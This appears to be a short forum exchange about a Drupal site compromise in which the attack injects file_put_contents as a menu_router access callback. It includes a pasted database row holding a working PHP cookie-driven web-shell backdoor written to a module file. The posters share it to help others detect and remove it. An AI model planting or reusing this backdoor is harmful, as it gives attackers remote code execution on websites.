This attack will add file_put_contents()
as the access_callback
in your menu_router
Subsequently, that path is used attempt to drop more exploit code.
Look in menu router for file_put_contents and remove it if found.
This was a great heads up. I found a slight variant in one of my databases
| path | load_functions | to_arg_functions | access_callback | access_arguments | page_callback | page_arguments | delivery_callback | fit | number_parts | context | tab_parent | tab_root | title | title_callback | title_arguments | theme_callback | theme_arguments | type | description | position | weight | include_file |
| cuyyct | | | file_put_contents | a:2:{i:0;s:24:"modules/trigger/eygo.php";i:1;s:147:"<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();";} | | NULL | | 0 | 0 | 0 | | | | | | | | 0 | cuyyct | | 0 | NULL |